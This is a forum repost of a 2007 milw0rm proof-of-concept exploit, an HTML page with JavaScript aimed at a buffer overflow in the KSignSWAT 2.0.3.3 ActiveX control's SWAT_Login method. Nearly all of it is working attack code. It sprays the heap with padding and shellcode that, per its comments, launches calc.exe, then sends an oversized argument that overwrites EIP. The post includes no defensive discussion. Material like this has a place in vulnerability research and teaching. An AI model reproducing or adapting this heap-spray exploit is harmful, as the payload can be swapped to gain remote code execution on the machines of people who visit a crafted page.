Exploit KSign KSignSWAT 2.0.3.3 - ActiveX Control Remote Buffer Overflow

Exploiter · 21 Дек 2022

HTML:

<!--
///////////////////////////////////////////////////////////////////
// KSignSWAT SWAT_Login() PoC Code.                              //
//                                                               //
// URL : www.ksign.com                                           //
// Author : KIM Kee-hong ([email protected])                    //
// Date : 2007/05/13                                             //
// Notice : Tested on WinXP SP2 KOREAN (all patched) with IE 6   //
///////////////////////////////////////////////////////////////////
-->

<html>
<head>
<title> www.ksign.com - KSignSWAT SWAT_Login() PoC code </title>
</head>

<body>
<object ID="vuln" CLASSID="clsid:F326007F-DD23-4724-BAFC-B1C97FC18794">
</object>
<script language=javascript>


function GetHeapPad(HeapJam, SizeofHeapPad)
{
    while(HeapJam.length*2 < SizeofHeapPad)
    {
         HeapJam +=HeapJam;
    }
    HeapJam = HeapJam.substring(0, SizeofHeapPad/2);
    return HeapJam;
}

// buffer 671 bytes write, then EIP overwrite.

var O5pad=unescape(
         "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
         "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
         "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
         "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
         "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
         "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
         "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
         "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
         "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
         "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
         "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
         "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
         "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
         "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
         "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
         "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
         "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
         "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
         "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
         "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
         "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
         "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
         "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
         "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
         "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
         "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
         "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
         "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
         "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
         "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
         "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
         "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
         "%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05" +
         "%05%05%05%05%05%05%05%05%05%05%05");

var HeapJamAddr = 0x05050505;

var SizeofHeap = 0x200000;

// calc.exe code.

var calcCode = unescape(
         "%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090" +
         "%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F" +
         "%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA" +
         "%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F" +
         "%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78" +
         "%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C" +
         "%uF631%u5660%uF889%uC083%u507B%uF068%u048A%u685F%uFE98%u0E8A%uFF57" +
         "%u63E7%u6C61%u0063");

var SizeofCalc = calcCode.length * 2;
var SizeofHeapPad = SizeofHeap - (SizeofCalc+0x38);
var HeapJam = unescape("%u0505%u0505")
HeapJam = GetHeapPad(HeapJam, SizeofHeapPad);
HeapBread = (HeapJamAddr - 0x400000)/SizeofHeap;
mem = new Array();

for(i = 0; i<HeapBread; i++)
{
    mem[i] = HeapJam + calcCode;
}

try
{
    document.all.vuln.SWAT_Login(O5pad);
}catch(e){}

</script>
</body>
</html>

# milw0rm.com [2007-05-22]

Поиск

Exploit KSign KSignSWAT 2.0.3.3 - ActiveX Control Remote Buffer Overflow

Exploiter

Похожие темы